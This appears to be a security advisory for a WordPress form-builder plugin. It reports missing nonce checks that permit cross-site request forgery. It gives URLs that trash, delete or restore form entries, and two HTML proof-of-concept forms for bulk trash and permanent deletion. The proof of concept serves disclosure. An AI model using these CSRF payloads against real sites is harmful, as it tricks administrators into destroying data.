The plugin does not enforce nonce checks which could allow attackers to make a logged in admin or editor delete and restore arbitrary form entries via CSRF attacks
Single entry trash: https://example.com/wp-admin/admin.php?page=vfb-entries&action=trash&entry=2
Since entry permanent deletion: https://example.com/wp-admin/admin.php?page=vfb-entries&action=delete&entry=3
Single entry restoration: https://example.com/wp-admin/admin.php?page=vfb-entries&action=restore&entry=3
Bulk Trash
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=vfb-entries"
method="POST">
<input type="hidden" name="s" value="” />
<input type="hidden" name="action" value="trash" />
<input type="hidden" name="m" value="0" />
<input type="hidden" name="form-filter" value="-1" />
<input type="hidden" name="paged" value="1" />
<input type="hidden" name="entry[]" value="5" />
<input type="hidden" name="entry[]" value="4" />
<input type="hidden" name="action2" value="trash" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Bulk permanent delete
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=vfb-entries"
method="POST">
<input type="hidden" name="s" value="” />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="m" value="0" />
<input type="hidden" name="form-filter" value="-1" />
<input type="hidden" name="paged" value="1" />
<input type="hidden" name="entry[]" value="5" />
<input type="hidden" name="entry[]" value="4" />
<input type="hidden" name="action2" value="delete" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>